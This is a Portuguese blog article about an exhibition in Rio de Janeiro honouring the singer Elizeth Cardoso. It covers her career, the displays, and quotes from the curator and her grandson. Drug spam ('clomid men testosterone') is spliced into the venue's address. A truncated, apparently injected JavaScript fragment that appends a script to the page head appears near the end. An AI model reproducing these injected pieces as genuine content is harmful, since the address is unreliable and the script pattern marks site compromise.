LateralNotíciaRio de Janeiro

Elizeth Cardoso, a Divina

Nosso site de música clássica abre parênteses e presta sua homenagem a esta figura clássica da música popular brasileira.

Uma das maiores intérpretes da música brasileira, Elizeth Cardoso está sendo homenageada em uma exposição no Imperator- Centro Cultural João Nogueira, Rio de Janeiro.

Nascida em uma família humilde do bairro de São Francisco Xavier, zona Norte do Rio, Elizeth era rica em talento e desde pequena já mostrava inclinação para a música. No início de sua carreira, alcançou o sucesso com o estilo samba-canção, mas depois incorporou novos elementos às suas interpretações. Um dos pontos altos de sua carreira foi em 1958, quando gravou o LP “Canção do Amor Demais”, com canções de Vinícius de Morais e Tom Jobim, no qual João Gilberto tocava violão.

Logo na entrada da exposição, um corredor com quadros posicionados em ordem cronológica conta a trajetória da cantora desde o início de sua carreira, quando foi convidada para cantar na Rádio Guanabara, até sua experiência com a Bossa Nova.

A ideia era homenagear e mostrar ao público mais jovem a importante contribuição de Elizeth para a música nacional. A família ficou feliz em contribuir e cedeu parte do acervo que está exposto aqui”, disse Miguel Jost, curador da exposição.

Em outra sala é possível ver de perto os vestidos que a Divina Elizeth, como a cantora era carinhosamente chamada, usava em suas apresentações. Logo ao lado, uma parede exibe frases de artistas contemporâneos sobre Elizeth. “Usamos a opinião desses artistas justamente para fazer a ligação com o público mais jovem”, disse Jost.

Neto de Elizeth e um dos responsáveis por preservar o acervo da cantora, Paulo César estava visivelmente emocionado. “Tenho a impressão de que a geração mais nova está voltando a ‘beber na fonte’. Percebo que estão buscando referências em cantores mais velhos, pela qualidade do trabalho feito”, diz César. Ele mostrou uma parede onde estava escrita a extensa discografia da cantora, ordenada por ano.

A exposição também conta com estações de música, onde o visitante pode sentar, colocar fones de ouvido e escutar as músicas gravadas por Elizeth. Uma sala similar a um pequeno cinema exibe entrevistas antigas da cantora.

Para comemorar o lançamento da exposição, a cantora Teresa Cristina fez uma apresentação cantando músicas gravadas por Elizeth Cardoso, com a participação especial da cantora Áurea Martins.

A exposição será exibida até fevereiro na sala Permanências do Imperator- Centro Cultural João Nogueira, na clomid men testosterone Rua Dias da Cruz, 170, Méier, Rio de Janeiro. O telefone para contato é (21) 2596-1090 ou (21) 2597-3897. A entrada é gratuita.


Confira abaixo Elizeth Cardoso cantando, “Canção de Amor”, em 1981

 

[youtube]http://www.youtube.com/watch?v=fwGUnAQxhb8#t=16[/youtube]

 

d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) {

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.